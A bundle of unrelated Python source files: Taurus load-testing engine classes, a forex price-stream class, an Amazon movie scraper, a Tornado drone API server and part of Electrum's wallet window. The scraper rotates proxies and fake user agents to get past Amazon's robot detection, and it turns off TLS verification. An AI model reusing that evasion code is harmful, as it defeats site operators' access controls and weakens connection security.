fds.write(yml)
else:
raise TaurusInternalException("Unknown dump format: %s" % fmt)
fds.write("\n".encode('utf-8'))
def dump(self, filename=None, fmt=None):
"""
Dump current state of dict into file. If no filename or format
specified, defaults are used
:type filename: str or NoneType
:type fmt: str or NoneType
"""
if not filename:
filename = self.dump_filename
if filename:
if not fmt:
self.dump(filename + ".yml", self.YAML)
self.dump(filename + ".json", self.JSON)
return
acopy = copy.deepcopy(self)
BetterDict.traverse(acopy, self.masq_sensitive)
BetterDict.traverse(acopy, self.replace_infinities)
with open(filename, "wb") as fhd:
self.log.debug("Dumping %s config into %s", fmt, filename)
acopy.write(fhd, fmt)
@staticmethod
def masq_sensitive(value, key, container):
"""
Remove sensitive data from config
"""
if isinstance(key, string_types):
for suffix in ('password', 'secret', 'token',):
if key.lower().endswith(suffix):
if value and isinstance(value, (string_types, text_type)):
container[key] = '*' * 8
@staticmethod
def replace_infinities(value, key, container):
"""
Remove non-string JSON values used by default JSON encoder (Infinity, -Infinity, NaN)
"""
del value
if isinstance(container[key], float):
if math.isinf(container[key]) or math.isnan(container[key]):
container[key] = str(container[key])
def _replace_tabs(self, lines, fname):
has_tab_indents = re.compile(r"^( *)(\t+)( *\S*)")
res = ""
for num, line in enumerate(lines):
replaced = has_tab_indents.sub(r"\1" + (" " * self.tab_replacement_spaces) + r"\3", line)
if replaced != line:
line = replaced
if self.warn_on_tab_replacement:
self.log.warning("Replaced leading tabs in file %s, line %s", fname, num)
self.log.warning("Line content is: %s", replaced.strip())
self.log.warning("Please remember that YAML spec does not allow using tabs for indentation")
res += line
return res
yaml.add_representer(Configuration, SafeRepresenter.represent_dict)
yaml.add_representer(BetterDict, SafeRepresenter.represent_dict)
if PY2:
yaml.add_representer(text_type, SafeRepresenter.represent_unicode)
yaml.add_representer(str, str_representer)
if PY2:
# dirty hack from http://stackoverflow.com/questions/1447287/format-floats-with-standard-json-module
encoder.FLOAT_REPR = lambda o: format(o, '.3g')
else:
pass # TODO: how to implement it?
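# A minimal usage sketch of the Configuration class above (illustration only, not part
# of the original module; the file names are invented). Later files are merged over
# earlier ones, and dump() without arguments writes both YAML and JSON variants.
def _configuration_usage_example():
    config = Configuration()
    config.tab_replacement_spaces = 4      # optionally replace leading tabs in YAML input
    config.load(["base.yml", "override.json"])
    config.set_dump_file("effective")      # dump() will produce effective.yml and effective.json
    config.dump()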
class EngineModule(object):
"""
Base class for any BZT engine module
:type engine: Engine
:type settings: BetterDict
"""
def __init__(self):
self.log = logging.getLogger('')
self.engine = None
self.settings = BetterDict()
self.parameters = BetterDict()
def prepare(self):
"""
Preparation stage, at which configuration is being read, configs
and tools being prepared. All long preparations and checks should be
made here, to make `startup` stage as fast as possible.
"""
pass
def startup(self):
"""
Startup should be as fast as possible. Launch background processes,
do some API calls for initiation of actual work. Consider making all
checks and preparations on `prepare` stage.
"""
pass
def check(self):
"""
Check if work should be finished
:rtype: bool
:return: True if should be finished
"""
return False
def shutdown(self):
"""
Stop all processes that were started in `startup` stage.
Should also be as fast as possible, deferring all long operations to
`post_process` stage.
"""
pass
def post_process(self):
"""
Do all possibly long analysis and processing on run results
"""
pass
def _should_run(self):
"""
Returns True if provisioning matches run-at
"""
prov = self.engine.config.get(Provisioning.PROV)
runat = self.parameters.get("run-at", None)
if runat is not None and prov != runat:
self.log.debug("Should not run because of non-matching prov: %s != %s", prov, runat)
return False
return True
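# A hedged sketch (not part of the original module) of how the EngineModule lifecycle
# hooks described above are typically overridden; the class name and log messages are
# invented for illustration.
class _ExampleModule(EngineModule):
    def prepare(self):
        # heavy setup: read self.settings / self.parameters, install tools, etc.
        self.log.info("preparing with settings: %s", self.settings)

    def startup(self):
        # keep this fast: e.g. spawn a background process and return immediately
        self.log.info("starting up")

    def check(self):
        # return True once the module's work is finished
        return True

    def shutdown(self):
        # stop whatever startup() launched
        self.log.info("shutting down")

    def post_process(self):
        # long-running analysis of results goes here
        self.log.info("post-processing")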
class Provisioning(EngineModule):
"""
Base class for any provisioning type. Provisioning is the way to
get the resources that will run the job. For example, local provisioning
means using the local machine to run executors, while remote means using
remote machines with BZT API nodes on them.
:type executors: list[ScenarioExecutor]
"""
PROV = "provisioning"
def __init__(self):
super(Provisioning, self).__init__()
self.executors = []
self.disallow_empty_execution = True
def prepare(self):
"""
Preparation in provisioning begins with reading executions list
and instantiating ScenarioExecutor classes for them
"""
super(Provisioning, self).prepare()
esettings = self.engine.config.get(SETTINGS)
default_executor = esettings.get("default-executor", None)
exc = TaurusConfigError("No 'execution' is configured. Did you forget to pass config files?")
if ScenarioExecutor.EXEC not in self.engine.config and self.disallow_empty_execution:
raise exc
executions = self.engine.config.get(ScenarioExecutor.EXEC, [])
if not executions and self.disallow_empty_execution:
raise exc
if isinstance(executions, dict):
executions = [executions]
for execution in executions:
executor = execution.get("executor", default_executor)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
instance = self.engine.instantiate_module(executor)
instance.provisioning = self
instance.execution = execution
assert isinstance(instance, ScenarioExecutor)
self.executors.append(instance)
class FileLister(object):
"""
A mixin to get required files info from executor
"""
@abstractmethod
def resource_files(self):
"""
Get list of resource files
:rtype: list
"""
pass
class ScenarioExecutor(EngineModule):
"""
:type provisioning: engine.Provisioning
:type execution: BetterDict
"""
RAMP_UP = "ramp-up"
HOLD_FOR = "hold-for"
CONCURR = "concurrency"
THRPT = "throughput"
EXEC = "execution"
STEPS = "steps"
LOAD_FMT = namedtuple("LoadSpec", "concurrency throughput ramp_up hold iterations duration steps")
def __init__(self):
super(ScenarioExecutor, self).__init__()
self.env = None
self.provisioning = None
self.execution = BetterDict() # FIXME: why have this field if we have `parameters` from base class?
self.__scenario = None
self.label = None
self.widget = None
self.reader = None
self.delay = None
self.start_time = None
self.preprocess_args = lambda x: None
def _get_tool(self, tool, **kwargs):
env = Environment(self.log, self.env.get())
instance = tool(env=env, log=self.log, http_client=self.engine.get_http_client(), **kwargs)
assert isinstance(instance, RequiredTool)
return instance
def has_results(self):
if self.reader and self.reader.buffer:
return True
else:
return False
def get_script_path(self, required=False, scenario=None):
"""
:type required: bool
:type scenario: Scenario
"""
if scenario is None:
scenario = self.get_scenario()
if required:
exc = TaurusConfigError("You must provide script for %s" % self)
script = scenario.get(Scenario.SCRIPT, exc)
else:
script = scenario.get(Scenario.SCRIPT)
if script:
script = self.engine.find_file(script)
scenario[Scenario.SCRIPT] = script
return script
def get_scenario(self, name=None, cache_scenario=True):
"""
Returns scenario dict, extract if scenario is inlined
:return: DictOfDicts
"""
if name is None and self.__scenario is not None:
return self.__scenario
scenarios = self.engine.config.get("scenarios", force_set=True)
if name is None: # get current scenario
exc = TaurusConfigError("Scenario is not found in execution: %s" % self.execution)
label = self.execution.get('scenario', exc)
is_script = isinstance(label, string_types) and label not in scenarios and \
os.path.exists(self.engine.find_file(label))
if isinstance(label, list):
msg = "Invalid content of scenario, list type instead of dict or string: %s"
raise TaurusConfigError(msg % label)
if isinstance(label, dict) or is_script:
self.log.debug("Extract %s into scenarios" % label)
if isinstance(label, string_types):
scenario = BetterDict.from_dict({Scenario.SCRIPT: label})
else:
scenario = label
path = self.get_script_path(scenario=Scenario(self.engine, scenario))
if path:
label = os.path.basename(path)
if not path or label in scenarios:
hash_str = str(hashlib.md5(to_json(scenario).encode()).hexdigest())
label = 'autogenerated_' + hash_str[-10:]
scenarios[label] = scenario
self.execution['scenario'] = label
self.label = label
else: # get scenario by name
label = name
exc = TaurusConfigError("Scenario '%s' not found in scenarios: %s" % (label, scenarios.keys()))
scenario = scenarios.get(label, exc)
scenario_obj = Scenario(self.engine, scenario)
if name is None and cache_scenario:
self.__scenario = scenario_obj
return scenario_obj
def get_load(self):
"""
Helper method to read load specification
"""
def eval_int(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def eval_float(value):
try:
return float(value)
except (ValueError, TypeError):
return value
prov_type = self.engine.config.get(Provisioning.PROV)
ensure_is_dict(self.execution, ScenarioExecutor.THRPT, prov_type)
throughput = eval_float(self.execution[ScenarioExecutor.THRPT].get(prov_type, 0))
ensure_is_dict(self.execution, ScenarioExecutor.CONCURR, prov_type)
concurrency = eval_int(self.execution[ScenarioExecutor.CONCURR].get(prov_type, 0))
iterations = eval_int(self.execution.get("iterations", None))
ramp_up = self.execution.get(ScenarioExecutor.RAMP_UP, None)
steps = eval_int(self.execution.get(ScenarioExecutor.STEPS, None))
hold = dehumanize_time(self.execution.get(ScenarioExecutor.HOLD_FOR, 0))
if ramp_up is None:
duration = hold
else:
ramp_up = dehumanize_time(ramp_up)
duration = hold + ramp_up
if duration and not iterations:
iterations = 0 # which means infinite
msg = ''
if not isinstance(concurrency, numeric_types + (type(None),)):
msg += "Invalid concurrency value[%s]: %s " % (type(concurrency).__name__, concurrency)
if not isinstance(throughput, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(throughput).__name__, throughput)
if not isinstance(steps, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(steps).__name__, steps)
if not isinstance(iterations, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(iterations).__name__, iterations)
if msg:
raise TaurusConfigError(msg)
return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
iterations=iterations, duration=duration, steps=steps)
def get_resource_files(self):
files_list = []
if isinstance(self, FileLister):
files_list.extend(self.resource_files())
files_list.extend(self.execution.get("files", []))
return files_list
def __repr__(self):
return "%s/%s" % (self.execution.get("executor", None), self.label if self.label else id(self))
def execute(self, args, cwd=None, stdout=PIPE, stderr=PIPE, stdin=PIPE, shell=False):
self.preprocess_args(args)
return self.engine.start_subprocess(args=args, cwd=cwd, stdout=stdout,
stderr=stderr, stdin=stdin, shell=shell, env=self.env)
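# Hedged illustration (not part of the original module): the shape of a single
# "execution" entry as read by ScenarioExecutor.get_load(); key names follow the
# ScenarioExecutor constants above, values are invented for the example.
_EXAMPLE_EXECUTION = {
    "executor": "jmeter",     # module alias resolved via Engine.instantiate_module()
    "concurrency": 10,        # CONCURR
    "ramp-up": "1m",          # RAMP_UP, dehumanized to seconds by dehumanize_time()
    "hold-for": "2m30s",      # HOLD_FOR; duration = ramp_up + hold
    "iterations": 0,          # 0/absent together with a duration means "infinite"
    "scenario": "simple",     # looked up in the top-level "scenarios" section
}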
class Reporter(EngineModule):
"""
This type of module is responsible for
in-test and post-test results analysis
"""
REP = "reporting"
def should_run(self):
return self._should_run()
class Service(EngineModule):
"""
This type of module provides auxiliary services
that run alongside the test
"""
SERV = "services"
def should_run(self):
return self._should_run()
class Aggregator(EngineModule):
def __init__(self, is_functional):
super(Aggregator, self).__init__()
self.is_functional = is_functional
class Scenario(UserDict, object):
"""
Test scenario entity
"""
SCRIPT = "script"
COOKIES = "cookies"
FIELD_RESP_CODE = "http-code"
FIELD_HEADERS = "headers"
FIELD_BODY = "body"
FIELD_DATA_SOURCES = 'data-sources'
def __init__(self, engine, scenario=None):
super(Scenario, self).__init__()
self.engine = engine
self.data = scenario
def get(self, key, default=defaultdict):
"""
:param key:
:type default: object
:return:
"""
return self.data.get(key, default)
def __getitem__(self, item):
return self.data[item]
def __setitem__(self, key, value):
self.data[key] = value
def __iter__(self):
for item in self.data:
yield item
def __len__(self):
return len(self.data)
def __delitem__(self, key):
return self.data.pop(key)
def get_headers(self):
"""
Returns global headers
:rtype: dict[str,str]
"""
scenario = self
headers = scenario.get("headers", {})
if headers is None:
headers = {}
return headers
def get_requests(self, parser=RequestParser, require_url=True):
"""
Generator object to read requests
:type require_url: bool
:type parser: class
:rtype: list[bzt.requests_model.Request]
"""
requests_parser = parser(self, self.engine)
return requests_parser.extract_requests(require_url=require_url,)
def get_data_sources(self):
data_sources = self.get(self.FIELD_DATA_SOURCES, [])
if not isinstance(data_sources, list):
raise TaurusConfigError("data-sources '%s' is not a list" % data_sources)
for index, _ in enumerate(data_sources):
ensure_is_dict(data_sources, index, "path")
return self.get(self.FIELD_DATA_SOURCES, [])
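# Hedged illustration (not from the original source): Scenario.get_data_sources()
# accepts both plain strings and dicts; ensure_is_dict() normalizes a string entry
# into a dict keyed by "path", so the two entries below end up with the same shape.
_EXAMPLE_DATA_SOURCES = [
    "data/users.csv",            # shorthand, becomes {"path": "data/users.csv"}
    {"path": "data/users.csv"},  # explicit form
]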
class HavingInstallableTools(object):
@abstractmethod
def install_required_tools(self):
pass
class Singletone(object):
pass
class SelfDiagnosable(object):
@abstractmethod
def get_error_diagnostics(self):
"""
:rtype: list[str]
"""
pass
|
stream_price_event.py
|
import logging
import queue
import threading
from src.event import TickEvent
from src.pricing.stream import StreamingPrices
logger = logging.getLogger(__name__)
class StreamPriceEvent:
def __init__(self, instruments: list, events: queue.Queue, max_rec: int = None, account: str = 'mt4'):
self.instruments = instruments
self.events = events
self.max_rec = max_rec
self.account = account
def start(self):
sp = StreamingPrices(self.instruments, self.stream_to_queue, max_rec=self.max_rec, account=self.account)
sp.run()
def stream_to_queue(self, price: dict):
if price['type'] == 'PRICE':
tick = TickEvent(price['instrument'], price['time'], price['closeoutBid'], price['closeoutAsk'])
self.events.put(tick)
if __name__ == '__main__':
# For testing
qe = queue.Queue()
spe = StreamPriceEvent(['GBP_USD', 'GBP_AUD', 'EUR_GBP', 'EUR_USD'], qe, 50)
price_thread = threading.Thread(target=spe.start)
price_thread.start()
while True:
try:
event = qe.get(timeout=1)
except queue.Empty:
print('nothing in the queue!')
else:
print(f"Event received: {event}")
|
crawler.py
|
"""
Crawl the 250k records again to find the release date, movie title (including different versions), director, actors, genre and comments
"""
import time
import random
import threading
from fake_useragent import UserAgent
from bs4 import BeautifulSoup
import redis
import urllib3
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ua = UserAgent()
db = redis.StrictRedis(host='127.0.0.1', port=6379, decode_responses=True)
THREAD_NUM = 50
NUM = 20000
ip_dict = {}
def parser(html, raw_movie_id, proxy):
"""
Parse the fetched HTML and extract movie info
"""
soup = BeautifulSoup(html, 'lxml')
element = soup.find(id='productTitle')
movie = {'id': raw_movie_id}
# Get The Title
if element is None:
element = soup.find('h1', attrs={'class': 'avu-full-width'})
if element is None: # Error
db.sadd('raw_movie_id', raw_movie_id) # put back
print('Robot Detect!!!!!!!!!!!!!!!!!!!!!!')
if proxy in ip_dict:
ip_dict[proxy] += 1
if ip_dict[proxy] > 10:
requests.get('http://127.0.0.1:5010/delete?proxy=' + proxy) # delete proxy
else:
ip_dict[proxy] = 1
return False
else: # Prime Video Page
try:
movie = get_prime_page_info(soup, movie)
except Exception:
pass
else: # Simple Page
try:
movie = get_normal_page_info(soup, movie)
except Exception:
pass
if 'Director' not in html: # A movie must have a director
return False
if 'Fitness' in html: # Not a movie
return False
if 'Music Videos' in html:
return False
if 'Concerts' in html:
return False
if 'title' in movie and 'Season' in movie['title']:
return False
save_movie(movie, raw_movie_id)
return True
def save_movie(movie, movie_id):
"""
Save the movie into redis; verify the record is complete before storing it in the database
"""
if 'director' in movie and 'actor' in movie and 'title' in movie:
if 'genre' not in movie:
movie['genre'] = None
if 'review' not in movie:
movie['review'] = 0
if 'date' not in movie:
movie['date'] = None
db.hmset('movie: ' + movie_id, movie)
else:
print('Movie ' + movie_id + ' does not have full information!')
print('\n\n')
def get_and_parse(number):
"""
Get raw_movie_id, proxy and HTML, then send them to the parser
"""
header = {
'User-Agent': ua.random,
'accept-language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.6',
'accept': 'text/html,application/xhtml+xml,application/xml;\
q=0.9,image/webp,image/apng,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, br'
}
raw_movie_id = db.spop('raw_movie_id')
url = 'https://www.amazon.com/dp/' + raw_movie_id
r = requests.get('http://127.0.0.1:5010/get_all/').json()
if not r:
proxy = '127.0.0.1:1087'
else:
proxy = random.choice(r)
try:
proxier = {'https' : 'http://' + proxy}
response = requests.get(url, headers=header, proxies=proxier, timeout=10, verify=False)
except Exception:
db.sadd('raw_movie_id', raw_movie_id)
print('Requests Failure!\n\n')
else:
if response.status_code == 404:
print('Getting ' + url)
print('Number ' + str(number))
print('Page 404' + '\n\n')
elif response.status_code == 200: # get title
if parser(response.text, raw_movie_id, proxy):
print('Getting ' + url)
print('Number ' + str(number))
print('Yes!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Nope!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Something Wrong!')
db.sadd('raw_movie_id', raw_movie_id)
print(str(response.status_code) + '\n\n')
def get_normal_page_info(soup, movie):
"""
Get All Info From Normal Pages
"""
for child in soup.find('div', attrs={'class': 'content'}).ul.find_all('li'):
text = child.text.strip()
if 'Actor' in text:
movie['actor'] = [item.strip() for item in text.split(':')[1].split(',')] # actor
elif 'Director' in text:
movie['director'] = [item.strip() for item in text.split(':')[1].split(',')] # director
elif 'Release Date' in text:
movie['date'] = text.split(':')[1].strip() # release date
tmp = soup.find(id='acrCustomerReviewText').text
movie['review'] = int(tmp[0: tmp.find('customer') - 1]) # review number
movie['title'] = soup.find(id='productTitle').text.strip() # movie title
movie['genre'] = soup.find('ul').find_all('li')[-1].span.a.text.strip() # genre (save_movie expects this key)
return movie
def get_prime_page_info(soup, movie):
"""
Get All Info From Prime Video Pages
"""
movie['title'] = soup.find('h1', attrs={'class': 'avu-full-width'}).text.strip() # movie title
tmp = soup.find(id='dp-summary-see-all-reviews').text
movie['review'] = int(tmp[0: tmp.find('customer') - 1]) # review number
movie['date'] = soup.find('span', attrs={'data-automation-id': 'release-year-badge'}).text
for child in soup.find('table').find_all('tr'):
text = child.text.strip()
if 'Genre' in text:
movie['genre'] = [item.strip() for item in text.split('\n')[-1].split(',')] # genre
elif 'Director' in text:
movie['director'] = [item.strip() for item in text.split('\n')[-1].split(',')] # director
elif 'Actor' in text:
movie['actor'] = [item.strip() for item in text.split('\n')[-1].split(',')] # actor
elif 'date' in text or 'Date' in text:
movie['date'] = [item.strip() for item in text.split('\n')[-1].split(',')] # date
return movie
if __name__ == '__main__':
for i in range(NUM):
while threading.active_count() > THREAD_NUM: # Change
t = 4 * random.random()
if t < 0.5:
t += 1.5
elif t > 3.5:
t -= 2.5
time.sleep(t)
t = threading.Thread(target=get_and_parse, args=(i,))
t.start()
while threading.active_count() > 1: # Wait the thread I created to finish
time.sleep(0.2)
print('------------Finish-----------')
|
__init__.py
|
# std lib imports
import logging
import os
import sys
import signal
import threading
# tornado imports
import tornado.httpserver
import tornado.ioloop
from tornado.options import options
# module imports
from modules.base.tornadoql.tornadoql import TornadoQL
# import modules # noqa E402
from modules.api.mavros import MAVROSConnection
from modules.api.status import StatusModule
from modules.api import module_schema
class ApiServer(object):
def __init__(self):
self.exit = False
self.server = None
self.mavros_connection = None
self.mavlink_connection = None
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def initialize(self):
# setup the connection to ROS
loop = tornado.ioloop.IOLoop.current()
self.mavros_connection = MAVROSConnection(loop, module_schema)
self.mavros_thread = threading.Thread(target=self.mavros_connection.run)
self.mavros_thread.daemon = True
self.mavros_thread.start()
self.status_module = StatusModule(loop, module_schema)
application = TornadoQL()
self.server = tornado.httpserver.HTTPServer(application)
self.server.listen(port=options.server_port, address=options.server_interface)
logging.debug(
"Starting Maverick API server: {0}:{1}/{2}".format(
options.server_interface, options.server_port, options.app_prefix
)
)
def serve(self):
tornado.ioloop.IOLoop.current().start()
# this function blocks at this point until the server
# is asked to exit via request_stop()
logging.debug("Tornado finished")
def request_stop(self):
# TODO: close all websocket connections (required?)
ioloop = tornado.ioloop.IOLoop.current()
ioloop.add_callback(ioloop.stop)
logging.debug("Asked Tornado to exit")
def exit_gracefully(self, signum, frame):
"""called on sigterm"""
self.exit = True
if self.mavros_connection:
self.mavros_connection.shutdown()
if self.mavlink_connection:
self.mavlink_connection.shutdown()
self.request_stop()
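# Hedged usage sketch (not in the original module): typical lifecycle of the ApiServer
# defined above -- construct it, wire up Tornado via initialize(), then block in
# serve() until SIGINT/SIGTERM triggers exit_gracefully() and request_stop().
def _run_api_server_example():
    api_server = ApiServer()
    api_server.initialize()
    api_server.serve()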
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction, PreviewTxDialog
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
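# Hedged usage sketch (illustration only, not from the original file): a window method
# wrapped with @protected receives the wallet password via the 'password' keyword
# argument, or None for an unencrypted wallet / a cancelled dialog, e.g.:
#
#     @protected
#     def do_sign_example(self, address, message, password=None):
#         return self.wallet.sign_message(address, message, password)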
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
